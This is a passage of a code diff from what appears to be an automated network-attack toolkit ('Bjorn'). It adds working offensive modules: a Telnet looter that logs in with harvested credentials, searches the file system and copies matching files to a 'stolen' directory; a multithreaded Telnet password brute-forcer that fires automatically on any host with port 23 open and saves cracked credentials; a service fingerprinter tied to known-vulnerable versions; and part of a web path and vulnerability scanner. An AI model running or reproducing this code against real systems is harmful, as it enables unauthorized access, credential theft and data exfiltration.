AND COALESCE(mac_address,'')=:mac
|
||||
AND (port IS NULL OR port=:port)
|
||||
""", params)
|
||||
|
||||
seen, out = set(), []
|
||||
for row in (by_ip + by_mac):
|
||||
u = str(row.get("user") or "").strip()
|
||||
p = str(row.get("password") or "").strip()
|
||||
if not u or (u, p) in seen:
|
||||
continue
|
||||
seen.add((u, p))
|
||||
out.append((u, p))
|
||||
return out
|
||||
|
||||
# -------- Telnet helpers --------
|
||||
def connect_telnet(self, ip: str, username: str, password: str) -> Optional[telnetlib.Telnet]:
|
||||
try:
|
||||
tn = telnetlib.Telnet(ip, b_port, timeout=10)
|
||||
tn.read_until(b"login: ", timeout=5)
|
||||
tn.write(username.encode('ascii') + b"\n")
|
||||
if password:
|
||||
tn.read_until(b"Password: ", timeout=5)
|
||||
tn.write(password.encode('ascii') + b"\n")
|
||||
# prompt detection (naïf mais identique à l'original)
|
||||
time.sleep(2)
|
||||
self.telnet_connected = True
|
||||
logger.info(f"Connected to {ip} via Telnet as {username}")
|
||||
return tn
|
||||
except Exception as e:
|
||||
logger.error(f"Telnet connect error {ip} {username}: {e}")
|
||||
return None
|
||||
|
||||
def find_files(self, tn: telnetlib.Telnet, dir_path: str) -> List[str]:
|
||||
try:
|
||||
if self.shared_data.orchestrator_should_exit or self.stop_execution:
|
||||
logger.info("File search interrupted.")
|
||||
return []
|
||||
tn.write(f'find {dir_path} -type f\n'.encode('ascii'))
|
||||
out = tn.read_until(b"$", timeout=10).decode('ascii', errors='ignore')
|
||||
files = out.splitlines()
|
||||
matches = []
|
||||
for f in files:
|
||||
if self.shared_data.orchestrator_should_exit or self.stop_execution:
|
||||
logger.info("File search interrupted.")
|
||||
return []
|
||||
fname = os.path.basename(f.strip())
|
||||
if (self.shared_data.steal_file_extensions and any(fname.endswith(ext) for ext in self.shared_data.steal_file_extensions)) or \
|
||||
(self.shared_data.steal_file_names and any(sn in fname for sn in self.shared_data.steal_file_names)):
|
||||
matches.append(f.strip())
|
||||
logger.info(f"Found {len(matches)} matching files under {dir_path}")
|
||||
return matches
|
||||
except Exception as e:
|
||||
logger.error(f"Telnet find error: {e}")
|
||||
return []
|
||||
|
||||
def steal_file(self, tn: telnetlib.Telnet, remote_file: str, base_dir: str) -> None:
|
||||
try:
|
||||
if self.shared_data.orchestrator_should_exit or self.stop_execution:
|
||||
logger.info("Steal interrupted.")
|
||||
return
|
||||
local_file_path = os.path.join(base_dir, os.path.relpath(remote_file, '/'))
|
||||
os.makedirs(os.path.dirname(local_file_path), exist_ok=True)
|
||||
with open(local_file_path, 'wb') as f:
|
||||
tn.write(f'cat {remote_file}\n'.encode('ascii'))
|
||||
f.write(tn.read_until(b"$", timeout=10))
|
||||
logger.success(f"Downloaded {remote_file} -> {local_file_path}")
|
||||
except Exception as e:
|
||||
logger.error(f"Telnet download error {remote_file}: {e}")
|
||||
|
||||
# -------- Orchestrator entry --------
|
||||
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
|
||||
try:
|
||||
self.shared_data.bjorn_orch_status = b_class
|
||||
try:
|
||||
port_i = int(port)
|
||||
except Exception:
|
||||
port_i = b_port
|
||||
|
||||
creds = self._get_creds_for_target(ip, port_i)
|
||||
logger.info(f"Found {len(creds)} Telnet credentials in DB for {ip}")
|
||||
if not creds:
|
||||
logger.error(f"No Telnet credentials for {ip}. Skipping.")
|
||||
return 'failed'
|
||||
|
||||
def _timeout():
|
||||
if not self.telnet_connected:
|
||||
logger.error(f"No Telnet connection within 4 minutes for {ip}. Failing.")
|
||||
self.stop_execution = True
|
||||
|
||||
timer = Timer(240, _timeout)
|
||||
timer.start()
|
||||
|
||||
mac = (row or {}).get("MAC Address") or self.mac_for_ip(ip) or "UNKNOWN"
|
||||
base_dir = os.path.join(self.shared_data.data_stolen_dir, f"telnet/{mac}_{ip}")
|
||||
|
||||
success = False
|
||||
for username, password in creds:
|
||||
if self.stop_execution or self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Execution interrupted.")
|
||||
break
|
||||
try:
|
||||
tn = self.connect_telnet(ip, username, password)
|
||||
if not tn:
|
||||
continue
|
||||
files = self.find_files(tn, '/')
|
||||
if files:
|
||||
for remote in files:
|
||||
if self.stop_execution or self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Execution interrupted.")
|
||||
break
|
||||
self.steal_file(tn, remote, base_dir)
|
||||
logger.success(f"Stole {len(files)} files from {ip} as {username}")
|
||||
success = True
|
||||
try:
|
||||
tn.close()
|
||||
except Exception:
|
||||
pass
|
||||
if success:
|
||||
timer.cancel()
|
||||
return 'success'
|
||||
except Exception as e:
|
||||
logger.error(f"Telnet loot error {ip} {username}: {e}")
|
||||
|
||||
timer.cancel()
|
||||
return 'success' if success else 'failed'
|
||||
|
||||
except Exception as e:
|
||||
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
|
||||
return 'failed'
|
||||
272
resources/default_config/actions/telnet_bruteforce.py
Normal file
@@ -0,0 +1,272 @@
|
||||
"""
|
||||
telnet_bruteforce.py — Telnet bruteforce (DB-backed, no CSV/JSON, no rich)
|
||||
- Cibles: (ip, port) par l’orchestrateur
|
||||
- IP -> (MAC, hostname) via DB.hosts
|
||||
- Succès -> DB.creds (service='telnet')
|
||||
- Conserve la logique d’origine (telnetlib, queue/threads)
|
||||
"""
|
||||
|
||||
import os
|
||||
import telnetlib
|
||||
import threading
|
||||
import logging
|
||||
import time
|
||||
from queue import Queue
|
||||
from typing import List, Dict, Tuple, Optional
|
||||
|
||||
from shared import SharedData
|
||||
from logger import Logger
|
||||
|
||||
logger = Logger(name="telnet_bruteforce.py", level=logging.DEBUG)
|
||||
|
||||
b_class = "TelnetBruteforce"
|
||||
b_module = "telnet_bruteforce"
|
||||
b_status = "brute_force_telnet"
|
||||
b_port = 23
|
||||
b_parent = None
|
||||
b_service = '["telnet"]'
|
||||
b_trigger = 'on_any:["on_service:telnet","on_new_port:23"]'
|
||||
b_priority = 70
|
||||
b_cooldown = 1800 # 30 minutes entre deux runs
|
||||
b_rate_limit = '3/86400' # 3 fois par jour max
|
||||
|
||||
class TelnetBruteforce:
|
||||
"""Wrapper orchestrateur -> TelnetConnector."""
|
||||
|
||||
def __init__(self, shared_data):
|
||||
self.shared_data = shared_data
|
||||
self.telnet_bruteforce = TelnetConnector(shared_data)
|
||||
logger.info("TelnetConnector initialized.")
|
||||
|
||||
def bruteforce_telnet(self, ip, port):
|
||||
"""Lance le bruteforce Telnet pour (ip, port)."""
|
||||
return self.telnet_bruteforce.run_bruteforce(ip, port)
|
||||
|
||||
def execute(self, ip, port, row, status_key):
|
||||
"""Point d’entrée orchestrateur (retour 'success' / 'failed')."""
|
||||
logger.info(f"Executing TelnetBruteforce on {ip}:{port}")
|
||||
self.shared_data.bjorn_orch_status = "TelnetBruteforce"
|
||||
success, results = self.bruteforce_telnet(ip, port)
|
||||
return 'success' if success else 'failed'
|
||||
|
||||
|
||||
class TelnetConnector:
|
||||
"""Gère les tentatives Telnet, persistance DB, mapping IP→(MAC, Hostname)."""
|
||||
|
||||
def __init__(self, shared_data):
|
||||
self.shared_data = shared_data
|
||||
|
||||
# Wordlists inchangées
|
||||
self.users = self._read_lines(shared_data.users_file)
|
||||
self.passwords = self._read_lines(shared_data.passwords_file)
|
||||
|
||||
# Cache IP -> (mac, hostname)
|
||||
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
|
||||
self._refresh_ip_identity_cache()
|
||||
|
||||
self.lock = threading.Lock()
|
||||
self.results: List[List[str]] = [] # [mac, ip, hostname, user, password, port]
|
||||
self.queue = Queue()
|
||||
|
||||
# ---------- util fichiers ----------
|
||||
@staticmethod
|
||||
def _read_lines(path: str) -> List[str]:
|
||||
try:
|
||||
with open(path, "r", encoding="utf-8", errors="ignore") as f:
|
||||
return [l.rstrip("\n\r") for l in f if l.strip()]
|
||||
except Exception as e:
|
||||
logger.error(f"Cannot read file {path}: {e}")
|
||||
return []
|
||||
|
||||
# ---------- mapping DB hosts ----------
|
||||
def _refresh_ip_identity_cache(self) -> None:
|
||||
self._ip_to_identity.clear()
|
||||
try:
|
||||
rows = self.shared_data.db.get_all_hosts()
|
||||
except Exception as e:
|
||||
logger.error(f"DB get_all_hosts failed: {e}")
|
||||
rows = []
|
||||
|
||||
for r in rows:
|
||||
mac = r.get("mac_address") or ""
|
||||
if not mac:
|
||||
continue
|
||||
hostnames_txt = r.get("hostnames") or ""
|
||||
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
|
||||
ips_txt = r.get("ips") or ""
|
||||
if not ips_txt:
|
||||
continue
|
||||
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
|
||||
self._ip_to_identity[ip] = (mac, current_hn)
|
||||
|
||||
def mac_for_ip(self, ip: str) -> Optional[str]:
|
||||
if ip not in self._ip_to_identity:
|
||||
self._refresh_ip_identity_cache()
|
||||
return self._ip_to_identity.get(ip, (None, None))[0]
|
||||
|
||||
def hostname_for_ip(self, ip: str) -> Optional[str]:
|
||||
if ip not in self._ip_to_identity:
|
||||
self._refresh_ip_identity_cache()
|
||||
return self._ip_to_identity.get(ip, (None, None))[1]
|
||||
|
||||
# ---------- Telnet ----------
|
||||
def telnet_connect(self, adresse_ip: str, user: str, password: str) -> bool:
|
||||
try:
|
||||
tn = telnetlib.Telnet(adresse_ip)
|
||||
tn.read_until(b"login: ", timeout=5)
|
||||
tn.write(user.encode('ascii') + b"\n")
|
||||
if password:
|
||||
tn.read_until(b"Password: ", timeout=5)
|
||||
tn.write(password.encode('ascii') + b"\n")
|
||||
time.sleep(2)
|
||||
response = tn.expect([b"Login incorrect", b"Password: ", b"$ ", b"# "], timeout=5)
|
||||
try:
|
||||
tn.close()
|
||||
except Exception:
|
||||
pass
|
||||
if response[0] == 2 or response[0] == 3:
|
||||
return True
|
||||
except Exception:
|
||||
pass
|
||||
return False
|
||||
|
||||
# ---------- DB upsert fallback ----------
|
||||
def _fallback_upsert_cred(self, *, mac, ip, hostname, user, password, port, database=None):
|
||||
mac_k = mac or ""
|
||||
ip_k = ip or ""
|
||||
user_k = user or ""
|
||||
db_k = database or ""
|
||||
port_k = int(port or 0)
|
||||
|
||||
try:
|
||||
with self.shared_data.db.transaction(immediate=True):
|
||||
self.shared_data.db.execute(
|
||||
"""
|
||||
INSERT OR IGNORE INTO creds(service,mac_address,ip,hostname,"user","password",port,"database",extra)
|
||||
VALUES('telnet',?,?,?,?,?,?,?,NULL)
|
||||
""",
|
||||
(mac_k, ip_k, hostname or "", user_k, password or "", port_k, db_k),
|
||||
)
|
||||
self.shared_data.db.execute(
|
||||
"""
|
||||
UPDATE creds
|
||||
SET "password"=?,
|
||||
hostname=COALESCE(?, hostname),
|
||||
last_seen=CURRENT_TIMESTAMP
|
||||
WHERE service='telnet'
|
||||
AND COALESCE(mac_address,'')=?
|
||||
AND COALESCE(ip,'')=?
|
||||
AND COALESCE("user",'')=?
|
||||
AND COALESCE(COALESCE("database",""),'')=?
|
||||
AND COALESCE(port,0)=?
|
||||
""",
|
||||
(password or "", hostname or None, mac_k, ip_k, user_k, db_k, port_k),
|
||||
)
|
||||
except Exception as e:
|
||||
logger.error(f"fallback upsert_cred failed for {ip} {user}: {e}")
|
||||
|
||||
# ---------- worker / queue ----------
|
||||
def worker(self, success_flag):
|
||||
"""Worker thread for Telnet bruteforce attempts."""
|
||||
while not self.queue.empty():
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Orchestrator exit signal received, stopping worker thread.")
|
||||
break
|
||||
|
||||
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
|
||||
try:
|
||||
if self.telnet_connect(adresse_ip, user, password):
|
||||
with self.lock:
|
||||
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
|
||||
logger.success(f"Found credentials IP:{adresse_ip} | User:{user} | Password:{password}")
|
||||
self.save_results()
|
||||
self.removeduplicates()
|
||||
success_flag[0] = True
|
||||
finally:
|
||||
self.queue.task_done()
|
||||
|
||||
# Optional delay between attempts
|
||||
if getattr(self.shared_data, "timewait_telnet", 0) > 0:
|
||||
time.sleep(self.shared_data.timewait_telnet)
|
||||
|
||||
|
||||
def run_bruteforce(self, adresse_ip: str, port: int):
|
||||
mac_address = self.mac_for_ip(adresse_ip)
|
||||
hostname = self.hostname_for_ip(adresse_ip) or ""
|
||||
|
||||
total_tasks = len(self.users) * len(self.passwords)
|
||||
if total_tasks == 0:
|
||||
logger.warning("No users/passwords loaded. Abort.")
|
||||
return False, []
|
||||
|
||||
for user in self.users:
|
||||
for password in self.passwords:
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
|
||||
return False, []
|
||||
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
|
||||
|
||||
success_flag = [False]
|
||||
threads = []
|
||||
thread_count = min(40, max(1, total_tasks))
|
||||
|
||||
for _ in range(thread_count):
|
||||
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
|
||||
t.start()
|
||||
threads.append(t)
|
||||
|
||||
while not self.queue.empty():
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Orchestrator exit signal received, stopping bruteforce.")
|
||||
while not self.queue.empty():
|
||||
try:
|
||||
self.queue.get_nowait()
|
||||
self.queue.task_done()
|
||||
except Exception:
|
||||
break
|
||||
break
|
||||
|
||||
self.queue.join()
|
||||
for t in threads:
|
||||
t.join()
|
||||
|
||||
return success_flag[0], self.results
|
||||
|
||||
# ---------- persistence DB ----------
|
||||
def save_results(self):
|
||||
for mac, ip, hostname, user, password, port in self.results:
|
||||
try:
|
||||
self.shared_data.db.insert_cred(
|
||||
service="telnet",
|
||||
mac=mac,
|
||||
ip=ip,
|
||||
hostname=hostname,
|
||||
user=user,
|
||||
password=password,
|
||||
port=port,
|
||||
database=None,
|
||||
extra=None
|
||||
)
|
||||
except Exception as e:
|
||||
if "ON CONFLICT clause does not match" in str(e):
|
||||
self._fallback_upsert_cred(
|
||||
mac=mac, ip=ip, hostname=hostname, user=user,
|
||||
password=password, port=port, database=None
|
||||
)
|
||||
else:
|
||||
logger.error(f"insert_cred failed for {ip} {user}: {e}")
|
||||
self.results = []
|
||||
|
||||
def removeduplicates(self):
|
||||
pass
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
try:
|
||||
sd = SharedData()
|
||||
telnet_bruteforce = TelnetBruteforce(sd)
|
||||
logger.info("Telnet brute force module ready.")
|
||||
exit(0)
|
||||
except Exception as e:
|
||||
logger.error(f"Error: {e}")
|
||||
exit(1)
|
||||
214
resources/default_config/actions/thor_hammer.py
Normal file
@@ -0,0 +1,214 @@
|
||||
# Service fingerprinting and version detection tool for vulnerability identification.
|
||||
# Saves settings in `/home/bjorn/.settings_bjorn/thor_hammer_settings.json`.
|
||||
# Automatically loads saved settings if arguments are not provided.
|
||||
# -t, --target Target IP or hostname to scan (overrides saved value).
|
||||
# -p, --ports Ports to scan (default: common ports, comma-separated).
|
||||
# -o, --output Output directory (default: /home/bjorn/Bjorn/data/output/services).
|
||||
# -d, --delay Delay between probes in seconds (default: 1).
|
||||
# -v, --verbose Enable verbose output for detailed service information.
|
||||
|
||||
import os
|
||||
import json
|
||||
import socket
|
||||
import argparse
|
||||
import threading
|
||||
from datetime import datetime
|
||||
import logging
|
||||
from concurrent.futures import ThreadPoolExecutor
|
||||
import subprocess
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
b_class = "ThorHammer"
|
||||
b_module = "thor_hammer"
|
||||
b_enabled = 0
|
||||
|
||||
# Configure logging
|
||||
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
|
||||
|
||||
# Default settings
|
||||
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/services"
|
||||
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
|
||||
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "thor_hammer_settings.json")
|
||||
DEFAULT_PORTS = [21, 22, 23, 25, 53, 80, 110, 115, 139, 143, 194, 443, 445, 1433, 3306, 3389, 5432, 5900, 8080]
|
||||
|
||||
# Service signature database
|
||||
SERVICE_SIGNATURES = {
|
||||
21: {
|
||||
'name': 'FTP',
|
||||
'vulnerabilities': {
|
||||
'vsftpd 2.3.4': 'Backdoor command execution',
|
||||
'ProFTPD 1.3.3c': 'Remote code execution'
|
||||
}
|
||||
},
|
||||
22: {
|
||||
'name': 'SSH',
|
||||
'vulnerabilities': {
|
||||
'OpenSSH 5.3': 'Username enumeration',
|
||||
'OpenSSH 7.2p1': 'User enumeration timing attack'
|
||||
}
|
||||
},
|
||||
# Add more signatures as needed
|
||||
}
|
||||
|
||||
class ThorHammer:
|
||||
def __init__(self, target, ports=None, output_dir=DEFAULT_OUTPUT_DIR, delay=1, verbose=False):
|
||||
self.target = target
|
||||
self.ports = ports or DEFAULT_PORTS
|
||||
self.output_dir = output_dir
|
||||
self.delay = delay
|
||||
self.verbose = verbose
|
||||
self.results = {
|
||||
'target': target,
|
||||
'timestamp': datetime.now().isoformat(),
|
||||
'services': {}
|
||||
}
|
||||
self.lock = threading.Lock()
|
||||
|
||||
def probe_service(self, port):
|
||||
"""Probe a specific port for service information."""
|
||||
try:
|
||||
# Initial connection test
|
||||
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
sock.settimeout(self.delay)
|
||||
result = sock.connect_ex((self.target, port))
|
||||
|
||||
if result == 0:
|
||||
service_info = {
|
||||
'port': port,
|
||||
'state': 'open',
|
||||
'service': None,
|
||||
'version': None,
|
||||
'vulnerabilities': []
|
||||
}
|
||||
|
||||
# Get service banner
|
||||
try:
|
||||
banner = sock.recv(1024).decode('utf-8', errors='ignore').strip()
|
||||
service_info['banner'] = banner
|
||||
except:
|
||||
service_info['banner'] = None
|
||||
|
||||
# Advanced service detection using nmap if available
|
||||
try:
|
||||
nmap_output = subprocess.check_output(
|
||||
['nmap', '-sV', '-p', str(port), '-T4', self.target],
|
||||
stderr=subprocess.DEVNULL
|
||||
).decode()
|
||||
|
||||
# Parse nmap output
|
||||
for line in nmap_output.split('\n'):
|
||||
if str(port) in line and 'open' in line:
|
||||
service_info['service'] = line.split()[2]
|
||||
if len(line.split()) > 3:
|
||||
service_info['version'] = ' '.join(line.split()[3:])
|
||||
except:
|
||||
pass
|
||||
|
||||
# Check for known vulnerabilities
|
||||
if port in SERVICE_SIGNATURES:
|
||||
sig = SERVICE_SIGNATURES[port]
|
||||
service_info['service'] = service_info['service'] or sig['name']
|
||||
if service_info['version']:
|
||||
for vuln_version, vuln_desc in sig['vulnerabilities'].items():
|
||||
if vuln_version.lower() in service_info['version'].lower():
|
||||
service_info['vulnerabilities'].append({
|
||||
'version': vuln_version,
|
||||
'description': vuln_desc
|
||||
})
|
||||
|
||||
with self.lock:
|
||||
self.results['services'][port] = service_info
|
||||
if self.verbose:
|
||||
logging.info(f"Service detected on port {port}: {service_info['service']}")
|
||||
|
||||
sock.close()
|
||||
|
||||
except Exception as e:
|
||||
logging.error(f"Error probing port {port}: {e}")
|
||||
|
||||
def save_results(self):
|
||||
"""Save scan results to a JSON file."""
|
||||
try:
|
||||
os.makedirs(self.output_dir, exist_ok=True)
|
||||
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
|
||||
filename = os.path.join(self.output_dir, f"service_scan_{timestamp}.json")
|
||||
|
||||
with open(filename, 'w') as f:
|
||||
json.dump(self.results, f, indent=4)
|
||||
logging.info(f"Results saved to {filename}")
|
||||
except Exception as e:
|
||||
logging.error(f"Failed to save results: {e}")
|
||||
|
||||
def execute(self):
|
||||
"""Execute the service scanning and fingerprinting process."""
|
||||
logging.info(f"Starting service scan on {self.target}")
|
||||
|
||||
with ThreadPoolExecutor(max_workers=10) as executor:
|
||||
executor.map(self.probe_service, self.ports)
|
||||
|
||||
self.save_results()
|
||||
return self.results
|
||||
|
||||
def save_settings(target, ports, output_dir, delay, verbose):
|
||||
"""Save settings to JSON file."""
|
||||
try:
|
||||
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
|
||||
settings = {
|
||||
"target": target,
|
||||
"ports": ports,
|
||||
"output_dir": output_dir,
|
||||
"delay": delay,
|
||||
"verbose": verbose
|
||||
}
|
||||
with open(SETTINGS_FILE, 'w') as f:
|
||||
json.dump(settings, f)
|
||||
logging.info(f"Settings saved to {SETTINGS_FILE}")
|
||||
except Exception as e:
|
||||
logging.error(f"Failed to save settings: {e}")
|
||||
|
||||
def load_settings():
|
||||
"""Load settings from JSON file."""
|
||||
if os.path.exists(SETTINGS_FILE):
|
||||
try:
|
||||
with open(SETTINGS_FILE, 'r') as f:
|
||||
return json.load(f)
|
||||
except Exception as e:
|
||||
logging.error(f"Failed to load settings: {e}")
|
||||
return {}
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(description="Service fingerprinting and vulnerability detection tool")
|
||||
parser.add_argument("-t", "--target", help="Target IP or hostname")
|
||||
parser.add_argument("-p", "--ports", help="Ports to scan (comma-separated)")
|
||||
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory")
|
||||
parser.add_argument("-d", "--delay", type=float, default=1, help="Delay between probes")
|
||||
parser.add_argument("-v", "--verbose", action="store_true", help="Enable verbose output")
|
||||
args = parser.parse_args()
|
||||
|
||||
settings = load_settings()
|
||||
target = args.target or settings.get("target")
|
||||
ports = [int(p) for p in args.ports.split(',')] if args.ports else settings.get("ports", DEFAULT_PORTS)
|
||||
output_dir = args.output or settings.get("output_dir")
|
||||
delay = args.delay or settings.get("delay")
|
||||
verbose = args.verbose or settings.get("verbose")
|
||||
|
||||
if not target:
|
||||
logging.error("Target is required. Use -t or save it in settings")
|
||||
return
|
||||
|
||||
save_settings(target, ports, output_dir, delay, verbose)
|
||||
|
||||
scanner = ThorHammer(
|
||||
target=target,
|
||||
ports=ports,
|
||||
output_dir=output_dir,
|
||||
delay=delay,
|
||||
verbose=verbose
|
||||
)
|
||||
scanner.execute()
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
313
resources/default_config/actions/valkyrie_scout.py
Normal file
@@ -0,0 +1,313 @@
|
||||
# Web application scanner for discovering hidden paths and vulnerabilities.
|
||||
# Saves settings in `/home/bjorn/.settings_bjorn/valkyrie_scout_settings.json`.
|
||||
# Automatically loads saved settings if arguments are not provided.
|
||||
# -u, --url Target URL to scan (overrides saved value).
|
||||
# -w, --wordlist Path to directory wordlist (default: built-in list).
|
||||
# -o, --output Output directory (default: /home/bjorn/Bjorn/data/output/webscan).
|
||||
# -t, --threads Number of concurrent threads (default: 10).
|
||||
# -d, --delay Delay between requests in seconds (default: 0.1).
|
||||
|
||||
import os
|
||||
import json
|
||||
import requests
|
||||
import argparse
|
||||
from datetime import datetime
|
||||
import logging
|
||||
import threading
|
||||
from concurrent.futures import ThreadPoolExecutor
|
||||
from urllib.parse import urljoin
|
||||
import re
|
||||
from bs4 import BeautifulSoup
|
||||
|
||||
|
||||
b_class = "ValkyrieScout"
|
||||
b_module = "valkyrie_scout"
|
||||
b_enabled = 0
|
||||
|
||||
# Configure logging
|
||||
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
|
||||
|
||||
# Default settings
|
||||
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/webscan"
|
||||
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
|
||||
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "valkyrie_scout_settings.json")
|
||||
|
||||
# Common web vulnerabilities to check
|
||||
VULNERABILITY_PATTERNS = {
|
||||
'sql_injection': [
|
||||
"error in your SQL syntax",
|
||||
"mysql_fetch_array",
|
||||
"ORA-",
|
||||
"PostgreSQL",
|
||||
],
|
||||
'xss': [
|
||||
"<script>alert(1)</script>",
|
||||
"javascript:alert(1)",
|
||||
],
|
||||
'lfi': [
|
||||
"include(",
|
||||
"require(",
|
||||
"include_once(",
|
||||
"require_once(",
|
||||
]
|
||||
}
|
||||
|
||||
class ValkyieScout:
|
||||
def __init__(self, url, wordlist=None, output_dir=DEFAULT_OUTPUT_DIR, threads=10, delay=0.1):
|
||||
self.base_url = url.rstrip('/')
|
||||
self.wordlist = wordlist
|
||||
self.output_dir = output_dir
|
||||
self.threads = threads
|
||||
self.delay = delay
|
||||
|
||||
self.discovered_paths = set()
|
||||
self.vulnerabilities = []
|
||||
self.forms = []
|
||||
|
||||
self.session = requests.Session()
|
||||
self.session.headers = {
|
||||
'User-Agent': 'Valkyrie Scout Web Scanner',
|
||||
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
|
||||
}
|
||||
|
||||
self.lock = threading.Lock()
|
||||
|
||||
def load_wordlist(self):
|
||||
"""Load directory wordlist."""
|
||||
if self.wordlist and os.path.exists(self.wordlist):
|
||||
with open(self.wordlist, 'r') as f:
|
||||
return [line.strip() for line in f if line.strip()]
|
||||
return [
|
||||
'admin', 'wp-admin', 'administrator', 'login', 'wp-login.php',
|
||||
'upload', 'uploads', 'backup', 'backups', 'config', 'configuration',
|
||||
'dev', 'development', 'test', 'testing', 'staging', 'prod',
|
||||
'api', 'v1', 'v2', 'beta', 'debug', 'console', 'phpmyadmin',
|
||||
'mysql', 'database', 'db', 'wp-content', 'includes', 'tmp', 'temp'
|
||||
]
|
||||
|
||||
def scan_path(self, path):
|
||||
"""Scan a single path for existence and vulnerabilities."""
|
||||
url = urljoin(self.base_url, path)
|
||||
try:
|
||||
response = self.session.get(url, allow_redirects=False)
|
||||
|
||||
if response.status_code in [200, 301, 302, 403]:
|
||||
with self.lock:
|
||||
self.discovered_paths.add({
|
||||
'path': path,
|
||||
'url': url,
|
||||
'status_code': response.status_code,
|
||||
'content_length': len(response.content),
|
||||
'timestamp': datetime.now().isoformat()
|
||||
})
|
||||
|
||||
# Scan for vulnerabilities
|
||||
self.check_vulnerabilities(url, response)
|
||||
|
||||
# Extract and analyze forms
|
||||
self.analyze_forms(url, response)
|
||||
|
||||
except Exception as e:
|
||||
logging.error(f"Error scanning {url}: {e}")
|
||||
|
||||
def check_vulnerabilities(self, url, response):
|
||||
"""Check for common vulnerabilities in the response."""
|
||||
try:
|
||||
content = response.text.lower()
|
||||
|
||||
for vuln_type, patterns in VULNERABILITY_PATTERNS.items():
|
||||
for pattern in patterns:
|
||||
if pattern.lower() in content:
|
||||
with self.lock:
|
||||
self.vulnerabilities.append({
|
||||
'type': vuln_type,
|
||||
'url': url,
|
||||
'pattern': pattern,
|
||||
'timestamp': datetime.now().isoformat()
|
||||
})
|
||||
|
||||
# Additional checks
|
||||
self.check_security_headers(url, response)
|
||||
self.check_information_disclosure(url, response)
|
||||
|
||||
except Exception as e:
|
||||
logging.error(f"Error checking vulnerabilities for {url}: {e}")
|
||||
|
||||
def analyze_forms(self, url, response):
|
||||
"""Analyze HTML forms for potential vulnerabilities."""
|
||||
try:
|
||||
soup = BeautifulSoup(response.text, 'html.parser')
|
||||
forms = soup.find_all('form')
|
||||
|
||||
for form in forms:
|
||||
form_data = {
|
||||
'url': url,
|
||||
'method': form.get('method', 'get').lower(),
|
||||
'action': urljoin(url, form.get('action', '')),
|
||||
'inputs': [],
|
||||
'timestamp': datetime.now().isoformat()
|
||||
}
|
||||
|
||||
# Analyze form inputs
|
||||
for input_field in form.find_all(['input', 'textarea']):
|
||||
input_data = {
|
||||
'type': input_field.get('type', 'text'),
|
||||
'name': input_field.get('name', ''),
|
||||
'id': input_field.get('id', ''),
|
||||
'required': input_field.get('required') is not None
|
||||
}
|
||||
form_data['inputs'].append(input_data)
|
||||
|
||||
with self.lock:
|
||||
self.forms.append(form_data)
|
||||
|
||||
except Exception as e:
|
||||
logging.error(f"Error analyzing forms in {url}: {e}")
|
||||
|
||||
def check_security_headers(self, url, response):
|
||||
"""Check for missing or misconfigured security headers."""
|
||||
security_headers = {
|
||||
'X-Frame-Options': 'Missing X-Frame-Options header',
|
||||
'X-XSS-Protection': 'Missing X-XSS-Protection header',
|
||||
'X-Content-Type-Options': 'Missing X-Content-Type-Options header',
|
||||
'Strict-Transport-Security': 'Missing HSTS header',
|
||||
'Content-Security-Policy': 'Missing Content-Security-Policy'
|
||||
}
|
||||
|
||||
for header, message in security_headers.items():
|
||||
if header not in response.headers:
|
||||
with self.lock:
|
||||
self.vulnerabilities.append({
|
||||
'type': 'missing_security_header',
|
||||
'url': url,
|
||||
'detail': message,
|
||||
'timestamp': datetime.now().isoformat()
|
||||
})
|
||||
|
||||
def check_information_disclosure(self, url, response):
|
||||
"""Check for information disclosure in response."""
|
||||
patterns = {
|
||||
'email': r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}',
|
||||
'internal_ip': r'\b(?:192\.168|10\.|172\.(?:1[6-9]|2[0-9]|3[01]))\.\d{1,3}\.\d{1,3}\b',
|
||||
'debug_info': r'(?:stack trace|debug|error|exception)',
|
||||
'version_info': r'(?:version|powered by|built with)'
|
||||
}
|
||||
|
||||
content = response.text.lower()
|
||||
for info_type, pattern in patterns.items():
|
||||
matches = re.findall(pattern, content, re.IGNORECASE)
|
||||
if matches:
|
||||
with self.lock:
|
||||
self.vulnerabilities.append({
|
||||
'type': 'information_disclosure',
|
||||
'url': url,
|
||||
'info_type': info_type,
|
||||
'findings': matches,
|
||||
'timestamp': datetime.now().isoformat()
|
||||
})
|
||||
|
||||
def save_results(self):
|
||||
"""Save scan results to JSON files."""
|
||||
try:
|
||||
os.makedirs(self.output_dir, exist_ok=True)
|
||||
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
|
